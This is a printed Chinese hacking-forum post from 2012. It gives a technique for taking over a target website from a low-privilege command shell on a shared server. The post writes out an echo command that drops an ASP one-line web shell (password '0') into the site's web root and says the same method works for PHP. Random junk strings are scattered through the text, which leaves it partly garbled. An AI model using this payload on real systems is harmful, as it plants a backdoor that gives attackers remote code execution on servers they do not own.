中国网络渗透测试联盟

标题: 旁注cmd低权限下拿webshell [打印本页]
作者: admin    时间: 2012-9-23 14:40
标题: 旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
) s( `- D. _: r" G  \  V  K7 U, O; O7 G( w
命令格式- u& S) r$ K. n; y
" F5 c: k+ O( b9 N, t% X8 `
Echo 语句 >目标站绝对目录7 W  R6 `$ O) o# v; J% r, u& H" }
/ O' M5 Q9 z+ S2 m" k
例如: + d* C. C6 z. {2 V

% |5 }  x& \4 V. R& O1 e, i% n4 Hecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp, W' O" N0 {( Z# A* A9 t* g# u
: D+ Q' _5 M1 E9 Z3 D5 ?- N8 r
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。0 ~, u1 }" _; C# J




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2